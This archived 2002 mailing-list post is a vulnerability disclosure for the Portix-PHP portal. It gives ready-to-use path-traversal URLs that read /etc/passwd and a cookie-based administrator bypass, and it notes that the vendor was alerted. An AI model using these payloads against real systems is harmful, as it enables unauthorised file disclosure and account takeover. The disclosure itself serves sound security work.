Big Security Holes in Portix-PHP Portal

From: frog frog (leseulfrogat_private)
Date: Thu Jan 31 2002 - 08:19:47 PST

  • Next message: Alexander: "RE: switch jamming"

    
     ('binary' encoding is not supported, stored as-is)
    On all version. The last one is 0.4.02 .
    
    To view files in the hard disk :
    
    www.hostportix.com/index.php?l=../../../etc/passwd
    
    www.hostportix.com/index.php?
    l=forum/view.php&topic=../../../etc/passwd
    
    To be administrator :
    Send the cookie name=access value=ok 
    to /config/config.php .
    
    Portix team has been alerted.
    



    This archive was generated by hypermail 2b30 : Thu Jan 31 2002 - 08:30:00 PST